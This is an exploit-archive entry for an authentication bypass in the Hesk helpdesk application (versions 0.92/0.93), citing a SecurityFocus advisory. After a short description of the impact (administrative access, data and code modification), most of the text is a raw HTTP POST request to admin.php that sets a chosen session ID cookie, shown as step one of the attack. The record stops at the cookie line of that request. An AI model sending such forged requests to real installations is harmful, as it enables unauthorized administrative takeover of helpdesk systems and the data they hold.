26285_hesk 0.920.93-Session ID Authentication Bypass-PHP WebApps exploit.txt

Details

source: https://www.securityfocus.com/bid/14879/info

Hesk is prone to an authentication bypass vulnerability.

Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks.

1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345